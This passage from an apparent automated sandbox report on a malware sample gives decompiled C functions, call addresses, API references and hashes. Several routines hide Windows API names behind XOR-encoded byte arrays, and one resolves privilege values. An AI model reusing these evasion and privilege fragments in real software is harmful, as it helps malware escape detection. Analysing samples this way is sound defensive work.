                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCriticalEnterHeapSection__lock
                                                                    • String ID:
                                                                    • API String ID: 409319249-0
                                                                    • Opcode ID: 631a210273d5ffddc9de80ac321a46ab056520cfe1e229aa312a6a939344dd31
                                                                    • Instruction ID: f1610b00c834a9b604e71391abbfedb6f67567200d935a0d8c753689d7ae62f0
                                                                    • Opcode Fuzzy Hash: 631a210273d5ffddc9de80ac321a46ab056520cfe1e229aa312a6a939344dd31
                                                                    • Instruction Fuzzy Hash: F4F0C831F01632E7D750ABB1BE0675E7720FB01324F9A026AF854262E0CBFC0941DA5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00424675(intOrPtr _a4) {
                                                                    				void* _t6;
                                                                    				intOrPtr _t8;
                                                                    
                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                    				 *0x44c294 = _t6;
                                                                    				if(_t6 == 0) {
                                                                    					L4:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t8 = E0042465B();
                                                                    					 *0x44c298 = _t8;
                                                                    					if(_t8 != 3) {
                                                                    						L5:
                                                                    						return 1;
                                                                    					} else {
                                                                    						_push(0x3f8);
                                                                    						if(E004246C6() != 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							HeapDestroy( *0x44c294);
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}





                                                                    0x00424686
                                                                    0x0042468e
                                                                    0x00424693
                                                                    0x004246bf
                                                                    0x004246c1
                                                                    0x00424695
                                                                    0x00424695
                                                                    0x0042469d
                                                                    0x004246a2
                                                                    0x004246c2
                                                                    0x004246c5
                                                                    0x004246a4
                                                                    0x004246a4
                                                                    0x004246b1
                                                                    0x00000000
                                                                    0x004246b3
                                                                    0x004246b9
                                                                    0x00000000
                                                                    0x004246b9
                                                                    0x004246b1
                                                                    0x004246a2

                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00422D3D,00000001,?,004303A8,00000060), ref: 00424686
                                                                      • Part of subcall function 004246C6: RtlAllocateHeap.NTDLL(00000000,00000140,004246AE), ref: 004246D3
                                                                    • HeapDestroy.KERNEL32(?,004303A8,00000060), ref: 004246B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocateCreateDestroy
                                                                    • String ID:
                                                                    • API String ID: 316229882-0
                                                                    • Opcode ID: d2e44583d249fa54670c712290d6965761ca32f5e078bc4e3fc2beba0b6d3f53
                                                                    • Instruction ID: d98aaec34373d430263f92147fa14a5c7520aeb18d8516735b84bd06c5509dab
                                                                    • Opcode Fuzzy Hash: d2e44583d249fa54670c712290d6965761ca32f5e078bc4e3fc2beba0b6d3f53
                                                                    • Instruction Fuzzy Hash: 14E04874F513115EEB545B70BD4A71636D4EB86B45F444576F509C51B0EBBC8840990C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00406680(CHAR* _a4) {
                                                                    				void* _v32;
                                                                    				void* _v52;
                                                                    				void* _v60;
                                                                    				void* _v72;
                                                                    				void* __ebx;
                                                                    				void* __esi;
                                                                    				signed int _t12;
                                                                    				signed int _t15;
                                                                    				void* _t16;
                                                                    				void* _t17;
                                                                    				signed int _t19;
                                                                    				signed int _t20;
                                                                    				signed int _t23;
                                                                    				signed int _t24;
                                                                    				signed int _t31;
                                                                    				void* _t41;
                                                                    				void* _t43;
                                                                    				void* _t44;
                                                                    				signed int _t56;
                                                                    				signed int _t57;
                                                                    				signed int _t58;
                                                                    				void* _t63;
                                                                    				void* _t70;
                                                                    				void* _t74;
                                                                    
                                                                    				_t56 =  *0x447af4; // 0xbbbbbd3e
                                                                    				_t41 = E0041B2D0(_a4, 0x80000000, 3, 0, 3, 0, 0);
                                                                    				_v32 = _t41;
                                                                    				_t12 = _t56 & 0x00000047;
                                                                    				_t43 = 0x6d;
                                                                    				do {
                                                                    					_t3 = _t56 - 0x20e; // 0xbbbbbb30
                                                                    					_t56 = _t56 + (_t3 | _t12);
                                                                    					_t43 = _t43 - 1;
                                                                    				} while (_t43 != 0);
                                                                    				if(_t41 != 0xffffffff) {
                                                                    					_t57 = _t56 - 0x1f03;
                                                                    					_t63 = E0041AA70(_t41, 0, 2, 0, 0, 0);
                                                                    					_v32 = _t63;
                                                                    					if(_t63 != 0) {
                                                                    						_t15 = _t57 & 0x00000044;
                                                                    						_t44 = 0x6d;
                                                                    						do {
                                                                    							_t5 = _t57 - 0x1a2; // 0xbbbb9c99
                                                                    							_t57 = _t57 + (_t5 | _t15);
                                                                    							_t44 = _t44 - 1;
                                                                    						} while (_t44 != 0);
                                                                    						_t16 = MapViewOfFile(_t63, 4, 0, 0, 0); // executed
                                                                    						_t70 = _t16;
                                                                    						if(_t70 != 0) {
                                                                    							if(_t57 >= 0x53) {
                                                                    								_t58 = _t57 + 0x53;
                                                                    							} else {
                                                                    								_t58 = _t57 & 0x00000054;
                                                                    							}
                                                                    							_t17 = E0041B360(_t41, 0);
                                                                    							if(_t17 != 0xffffffff) {
                                                                    								_push( *((intOrPtr*)(_t74 + 0x20)));
                                                                    								_push(_t17);
                                                                    								_push(_t70);
                                                                    								E00406410();
                                                                    								_t19 =  *0x447af4; // 0xbbbbbd3e
                                                                    								if(_t19 >= 0x53) {
                                                                    									_t20 = _t19 + 0x53;
                                                                    								} else {
                                                                    									_t20 = _t19 & 0x00000054;
                                                                    								}
                                                                    								 *0x447af4 = _t20;
                                                                    								E0041ABC0(_t70);
                                                                    								E0041A8E0(_t63);
                                                                    								_t23 =  *0x447af4; // 0xbbbbbd3e
                                                                    								if(_t23 >= 0x53) {
                                                                    									_t24 = _t23 + 0x53;
                                                                    								} else {
                                                                    									_t24 = _t23 & 0x00000054;
                                                                    								}
                                                                    								 *0x447af4 = _t24;
                                                                    								E0041A8E0(_t41);
                                                                    								return 1;
                                                                    							} else {
                                                                    								E00405590(0x447af4, 0x40, 7);
                                                                    								E0041ABC0(_t70);
                                                                    								E0041A8E0( *((intOrPtr*)(_t74 + 0x10)));
                                                                    								_t31 =  *0x447af4; // 0xbbbbbd3e
                                                                    								 *0x447af4 = _t31 + (_t31 * 0x0000002d | (_t58 - 0x00006883) * 0x00000022) * 0x3b;
                                                                    								E0041A8E0( *((intOrPtr*)(_t74 + 0x14)));
                                                                    								return 0;
                                                                    							}
                                                                    						} else {
                                                                    							E0041A8E0(_t41);
                                                                    							E0041A8E0(_t63);
                                                                    							return 0;
                                                                    						}
                                                                    					} else {
                                                                    						E0041A8E0(_t41);
                                                                    						return 0;
                                                                    					}
                                                                    				} else {
                                                                    					return 0;
                                                                    				}
                                                                    			}



























                                                                    0x00406689
                                                                    0x004066a4
                                                                    0x004066a8
                                                                    0x004066ac
                                                                    0x004066af
                                                                    0x004066b4
                                                                    0x004066b4
                                                                    0x004066bc
                                                                    0x004066be
                                                                    0x004066be
                                                                    0x004066c4
                                                                    0x004066da
                                                                    0x004066e5
                                                                    0x004066e9
                                                                    0x004066ed
                                                                    0x00406700
                                                                    0x00406703
                                                                    0x00406710
                                                                    0x00406710
                                                                    0x00406718
                                                                    0x0040671a
                                                                    0x0040671a
                                                                    0x00406727
                                                                    0x0040672d
                                                                    0x00406731
                                                                    0x0040674c
                                                                    0x00406753
                                                                    0x0040674e
                                                                    0x0040674e
                                                                    0x0040674e
                                                                    0x00406759
                                                                    0x00406761
                                                                    0x004067be
                                                                    0x004067bf
                                                                    0x004067c0
                                                                    0x004067c1
                                                                    0x004067c6
                                                                    0x004067d5
                                                                    0x004067dc
                                                                    0x004067d7
                                                                    0x004067d7
                                                                    0x004067d7
                                                                    0x004067df
                                                                    0x004067e4
                                                                    0x004067ea
                                                                    0x004067ef
                                                                    0x004067f6
                                                                    0x004067fd
                                                                    0x004067f8
                                                                    0x004067f8
                                                                    0x004067f8
                                                                    0x00406800
                                                                    0x00406805
                                                                    0x00406816
                                                                    0x00406763
                                                                    0x00406772
                                                                    0x00406778
                                                                    0x00406788
                                                                    0x00406790
                                                                    0x004067a6
                                                                    0x004067ab
                                                                    0x004067b9
                                                                    0x004067b9
                                                                    0x00406733
                                                                    0x00406734
                                                                    0x0040673a
                                                                    0x00406748
                                                                    0x00406748
                                                                    0x004066ef
                                                                    0x004066f0
                                                                    0x004066fd
                                                                    0x004066fd
                                                                    0x004066c7
                                                                    0x004066cd
                                                                    0x004066cd

                                                                    APIs
                                                                      • Part of subcall function 0041B2D0: CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B356
                                                                      • Part of subcall function 0041AA70: CreateFileMappingA.KERNEL32(?,?,?,?,?,?,00000003,00000000,00000000,BBBBBB95,?,?,?), ref: 0041AB19
                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 00406727
                                                                      • Part of subcall function 0041A8E0: FindCloseChangeNotification.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041A950
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: File$Create$ChangeCloseFindMappingNotificationView
                                                                    • String ID:
                                                                    • API String ID: 3463664528-0
                                                                    • Opcode ID: cb07a3d7746e2ea096c2998d192e4cd621d51ed0830a05c35d1a9195d003fd7e
                                                                    • Instruction ID: 3cf230134bc0921143b6c7409c2028c14ee68ecea9c3ad96395becf331a3244f
                                                                    • Opcode Fuzzy Hash: cb07a3d7746e2ea096c2998d192e4cd621d51ed0830a05c35d1a9195d003fd7e
                                                                    • Instruction Fuzzy Hash: 85417B72B402006BD710B325EC43FAA739A9780778F15043BF502FB2C1DABDA857469E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00425F74(void* __ebx, void* __edi, void* __ebp, signed char** _a4) {
                                                                    				void* __esi;
                                                                    				signed int _t42;
                                                                    				signed short _t44;
                                                                    				signed int _t46;
                                                                    				void* _t52;
                                                                    				signed char* _t53;
                                                                    				signed int _t54;
                                                                    				signed char _t55;
                                                                    				signed int _t56;
                                                                    				signed int _t62;
                                                                    				signed int _t63;
                                                                    				void* _t64;
                                                                    				void* _t65;
                                                                    				signed char** _t70;
                                                                    
                                                                    				_t64 = __edi;
                                                                    				_t52 = __ebx;
                                                                    				_t70 = _a4;
                                                                    				_t42 = _t70[3];
                                                                    				if((_t42 & 0x00000083) == 0 || (_t42 & 0x00000040) != 0) {
                                                                    					L21:
                                                                    					return _t42 | 0xffffffff;
                                                                    				} else {
                                                                    					if((_t42 & 0x00000002) == 0) {
                                                                    						_t44 = _t42 | 0x00000001;
                                                                    						__eflags = _t44 & 0x0000010c;
                                                                    						_t70[3] = _t44;
                                                                    						if(__eflags != 0) {
                                                                    							 *_t70 = _t70[2];
                                                                    						} else {
                                                                    							E00428868(_t70);
                                                                    						}
                                                                    						_push(_t70[6]);
                                                                    						_push(_t70[2]);
                                                                    						_push(_t70[4]);
                                                                    						_t46 = E00426230(_t52, _t64, _t70, __eflags); // executed
                                                                    						__eflags = _t46;
                                                                    						_t70[1] = _t46;
                                                                    						if(_t46 == 0) {
                                                                    							L20:
                                                                    							asm("sbb eax, eax");
                                                                    							_t42 = ( ~_t46 & 0x00000010) + 0x10;
                                                                    							_t70[3] = _t70[3] | _t42;
                                                                    							_t40 =  &(_t70[1]);
                                                                    							 *_t40 = _t70[1] & 0x00000000;
                                                                    							__eflags =  *_t40;
                                                                    							goto L21;
                                                                    						} else {
                                                                    							__eflags = _t46 - 0xffffffff;
                                                                    							if(_t46 == 0xffffffff) {
                                                                    								goto L20;
                                                                    							} else {
                                                                    								_t62 = _t70[3];
                                                                    								__eflags = _t62 & 0x00000082;
                                                                    								if((_t62 & 0x00000082) == 0) {
                                                                    									_t56 = _t70[4];
                                                                    									__eflags = _t56 - 0xffffffff;
                                                                    									_push(_t64);
                                                                    									if(_t56 == 0xffffffff) {
                                                                    										_t65 = 0x447700;
                                                                    									} else {
                                                                    										_t65 =  *((intOrPtr*)(0x44b140 + (_t56 >> 5) * 4)) + ((_t56 & 0x0000001f) + (_t56 & 0x0000001f) * 8) * 4;
                                                                    									}
                                                                    									_t28 = _t65 + 4; // 0xa80
                                                                    									__eflags = ( *_t28 & 0x00000082) - 0x82;
                                                                    									if(( *_t28 & 0x00000082) == 0x82) {
                                                                    										_t63 = _t62 | 0x00002000;
                                                                    										__eflags = _t63;
                                                                    										_t70[3] = _t63;
                                                                    									}
                                                                    								}
                                                                    								__eflags = _t70[6] - 0x200;
                                                                    								if(_t70[6] == 0x200) {
                                                                    									_t55 = _t70[3];
                                                                    									__eflags = _t55 & 0x00000008;
                                                                    									if((_t55 & 0x00000008) != 0) {
                                                                    										__eflags = _t55 & 0x00000004;
                                                                    										if((_t55 & 0x00000004) == 0) {
                                                                    											_t70[6] = 0x1000;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								_t53 =  *_t70;
                                                                    								_t70[1] = _t46 - 1;
                                                                    								_t54 =  &(_t53[1]);
                                                                    								__eflags = _t54;
                                                                    								 *_t70 = _t54;
                                                                    								return  *_t53 & 0x000000ff;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t42 = _t42 | 0x00000020;
                                                                    						_t70[3] = _t42;
                                                                    						goto L21;
                                                                    					}
                                                                    				}
                                                                    			}

















                                                                    0x00425f74
                                                                    0x00425f74
                                                                    0x00425f75
                                                                    0x00425f79
                                                                    0x00425f7e
                                                                    0x00426050
                                                                    0x00426054
                                                                    0x00425f8c
                                                                    0x00425f8e
                                                                    0x00425f9b
                                                                    0x00425f9e
                                                                    0x00425fa2
                                                                    0x00425fa5
                                                                    0x00425fb3
                                                                    0x00425fa7
                                                                    0x00425fa8
                                                                    0x00425fad
                                                                    0x00425fb5
                                                                    0x00425fb8
                                                                    0x00425fbb
                                                                    0x00425fbe
                                                                    0x00425fc6
                                                                    0x00425fc8
                                                                    0x00425fcb
                                                                    0x0042603f
                                                                    0x00426041
                                                                    0x00426046
                                                                    0x00426049
                                                                    0x0042604c
                                                                    0x0042604c
                                                                    0x0042604c
                                                                    0x00000000
                                                                    0x00425fcd
                                                                    0x00425fcd
                                                                    0x00425fd0
                                                                    0x00000000
                                                                    0x00425fd2
                                                                    0x00425fd2
                                                                    0x00425fd5
                                                                    0x00425fd8
                                                                    0x00425fda
                                                                    0x00425fdd
                                                                    0x00425fe0
                                                                    0x00425fe1
                                                                    0x00425ffa
                                                                    0x00425fe3
                                                                    0x00425ff5
                                                                    0x00425ff5
                                                                    0x00425fff
                                                                    0x00426005
                                                                    0x00426009
                                                                    0x0042600b
                                                                    0x0042600b
                                                                    0x00426011
                                                                    0x00426011
                                                                    0x00426009
                                                                    0x00426014
                                                                    0x0042601b
                                                                    0x0042601d
                                                                    0x00426020
                                                                    0x00426023
                                                                    0x00426025
                                                                    0x00426028
                                                                    0x0042602a
                                                                    0x0042602a
                                                                    0x00426028
                                                                    0x00426023
                                                                    0x00426031
                                                                    0x00426034
                                                                    0x0042603a
                                                                    0x0042603a
                                                                    0x0042603b
                                                                    0x0042603e
                                                                    0x0042603e
                                                                    0x00425fd0
                                                                    0x00425f90
                                                                    0x00425f90
                                                                    0x00425f93
                                                                    0x00000000
                                                                    0x00425f93
                                                                    0x00425f8e

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: __getbuf
                                                                    • String ID:
                                                                    • API String ID: 554500569-0
                                                                    • Opcode ID: cfca85c1641fc4fb09faa2ba1e9ad441c267fa91c29841d7eb9b72b6656dcac0
                                                                    • Instruction ID: a17957c17871d10e1fc42ae0b371a5207aa77a1694d4982fe4c199e7e159193c
                                                                    • Opcode Fuzzy Hash: cfca85c1641fc4fb09faa2ba1e9ad441c267fa91c29841d7eb9b72b6656dcac0
                                                                    • Instruction Fuzzy Hash: DD21C131604B118FD734CF29E410767B7E1EF053A4B958A1ED4E6877D1D738A842DB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D510(DWORD* _a4, long _a8) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				intOrPtr _t32;
                                                                    				int _t34;
                                                                    				void* _t36;
                                                                    				void* _t40;
                                                                    				signed int _t43;
                                                                    				CHAR* _t46;
                                                                    
                                                                    				_t32 =  *0x447d78; // 0x0
                                                                    				_t43 =  *0x447d6c & 0xff;
                                                                    				_t40 = 0xb;
                                                                    				do {
                                                                    					_t40 = _t40 - 1;
                                                                    					_t32 = _t32 + _t43 - 0x43;
                                                                    				} while (_t40 != 0);
                                                                    				if( *0x447f90 == 0) {
                                                                    					_v25 = 0x81;
                                                                    					_v22 = 0x81;
                                                                    					_v19 = 0x81;
                                                                    					_v13 = 0x81;
                                                                    					_v10 = 0x81;
                                                                    					_v4 = 0x81;
                                                                    					 *_t46 = 0xad;
                                                                    					_v27 = 0x8a;
                                                                    					_v26 = 0x90;
                                                                    					_v24 = 0x96;
                                                                    					_v23 = 0x8a;
                                                                    					_v21 = 0x90;
                                                                    					_v20 = 0xa3;
                                                                    					_v18 = 0x90;
                                                                    					_v17 = 0xa7;
                                                                    					_v16 = 0x8b;
                                                                    					_v15 = 0x8a;
                                                                    					_v14 = 0x8a;
                                                                    					_v12 = 0x87;
                                                                    					_v11 = 0x90;
                                                                    					_v9 = 0x80;
                                                                    					_v8 = 0xb7;
                                                                    					_v7 = 0x90;
                                                                    					_v6 = 0x85;
                                                                    					_v5 = 0x90;
                                                                    					_v3 = 0xe4;
                                                                    					_t36 = 0;
                                                                    					do {
                                                                    						 *(_t46 + _t36) =  *(_t46 + _t36) ^ 0x000000e4;
                                                                    						_t36 = _t36 + 1;
                                                                    					} while (_t36 < 0x1a);
                                                                    					 *0x447f90 = E0041D440(_t46);
                                                                    				}
                                                                    				_t34 = InternetGetConnectedState(_a4, _a8); // executed
                                                                    				return _t34;
                                                                    			}


































                                                                    0x0041d518
                                                                    0x0041d51d
                                                                    0x0041d523
                                                                    0x0041d528
                                                                    0x0041d528
                                                                    0x0041d529
                                                                    0x0041d529
                                                                    0x0041d536
                                                                    0x0041d542
                                                                    0x0041d546
                                                                    0x0041d54a
                                                                    0x0041d54e
                                                                    0x0041d552
                                                                    0x0041d556
                                                                    0x0041d55a
                                                                    0x0041d55e
                                                                    0x0041d562
                                                                    0x0041d566
                                                                    0x0041d56b
                                                                    0x0041d56f
                                                                    0x0041d573
                                                                    0x0041d578
                                                                    0x0041d57c
                                                                    0x0041d581
                                                                    0x0041d586
                                                                    0x0041d58a
                                                                    0x0041d58e
                                                                    0x0041d593
                                                                    0x0041d597
                                                                    0x0041d59c
                                                                    0x0041d5a1
                                                                    0x0041d5a5
                                                                    0x0041d5aa
                                                                    0x0041d5ae
                                                                    0x0041d5b3
                                                                    0x0041d5b5
                                                                    0x0041d5b5
                                                                    0x0041d5b9
                                                                    0x0041d5ba
                                                                    0x0041d5cb
                                                                    0x0041d5cb
                                                                    0x0041d5da
                                                                    0x0041d5df

                                                                    APIs
                                                                    • InternetGetConnectedState.WININET(?,?), ref: 0041D5DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectedInternetState
                                                                    • String ID:
                                                                    • API String ID: 97057780-0
                                                                    • Opcode ID: 7a387c527952985047241a97375bd36016bd0a3b5de614a8a76046b75f33a1c8
                                                                    • Instruction ID: e570de1cd139eb845921a12e8ed7023ae42f66c6c18583c7f6a6b08afffe9e6e
                                                                    • Opcode Fuzzy Hash: 7a387c527952985047241a97375bd36016bd0a3b5de614a8a76046b75f33a1c8
                                                                    • Instruction Fuzzy Hash: 8821C06641D7C29EC312DB7C588489BBFD15DB7124F088E9DE0E8873A3D2248609D7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041CAC0(CHAR* _a4, CHAR* _a8, struct _LUID* _a12) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				int _t28;
                                                                    				void* _t32;
                                                                    				CHAR* _t40;
                                                                    
                                                                    				if( *0x447f24 == 0) {
                                                                    					_v23 = 0xaa;
                                                                    					_v22 = 0xaa;
                                                                    					_v16 = 0xac;
                                                                    					_v14 = 0xac;
                                                                    					_v12 = 0xa0;
                                                                    					_v10 = 0xa0;
                                                                    					_v5 = 0xa0;
                                                                    					 *_t40 = 0x89;
                                                                    					_v21 = 0xae;
                                                                    					_v20 = 0xb0;
                                                                    					_v19 = 0xb5;
                                                                    					_v18 = 0x95;
                                                                    					_v17 = 0xb7;
                                                                    					_v15 = 0xb3;
                                                                    					_v13 = 0xa9;
                                                                    					_v11 = 0xa2;
                                                                    					_v9 = 0x93;
                                                                    					_v8 = 0xa4;
                                                                    					_v7 = 0xa9;
                                                                    					_v6 = 0xb0;
                                                                    					_v4 = 0x84;
                                                                    					_v3 = 0xc5;
                                                                    					_t32 = 0;
                                                                    					do {
                                                                    						 *(_t40 + _t32) =  *(_t40 + _t32) ^ 0x000000c5;
                                                                    						_t32 = _t32 + 1;
                                                                    					} while (_t32 < 0x16);
                                                                    					 *0x447f24 = E0041C580(_t40);
                                                                    				}
                                                                    				_t28 = LookupPrivilegeValueA(_a4, _a8, _a12); // executed
                                                                    				return _t28;
                                                                    			}



























                                                                    0x0041caca
                                                                    0x0041cad2
                                                                    0x0041cad6
                                                                    0x0041cadc
                                                                    0x0041cae0
                                                                    0x0041caea
                                                                    0x0041caee
                                                                    0x0041caf2
                                                                    0x0041caf6
                                                                    0x0041cafa
                                                                    0x0041caff
                                                                    0x0041cb03
                                                                    0x0041cb08
                                                                    0x0041cb0d
                                                                    0x0041cb12
                                                                    0x0041cb17
                                                                    0x0041cb1b
                                                                    0x0041cb20
                                                                    0x0041cb25
                                                                    0x0041cb2a
                                                                    0x0041cb2e
                                                                    0x0041cb32
                                                                    0x0041cb37
                                                                    0x0041cb3c
                                                                    0x0041cb40
                                                                    0x0041cb40
                                                                    0x0041cb44
                                                                    0x0041cb45
                                                                    0x0041cb56
                                                                    0x0041cb56
                                                                    0x0041cb6a
                                                                    0x0041cb6f

                                                                    APIs
                                                                    • LookupPrivilegeValueA.ADVAPI32(?,?,?,?,?,?,00000000,00000028,00000000), ref: 0041CB6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 02bc9f97f934ec60fc6c8dda91512a529a6f596fae149a7a2667af070ec2290f
                                                                    • Instruction ID: c0349633e17d24b7b4e677a21fb07e21cfddf07c78334144e3cb8c570a360834
                                                                    • Opcode Fuzzy Hash: 02bc9f97f934ec60fc6c8dda91512a529a6f596fae149a7a2667af070ec2290f
                                                                    • Instruction Fuzzy Hash: 6B11C35201D7C29EC322DB7D594448BBFD519F6124F488B9DF0E88B3E2D264C60AD7A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041E270(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
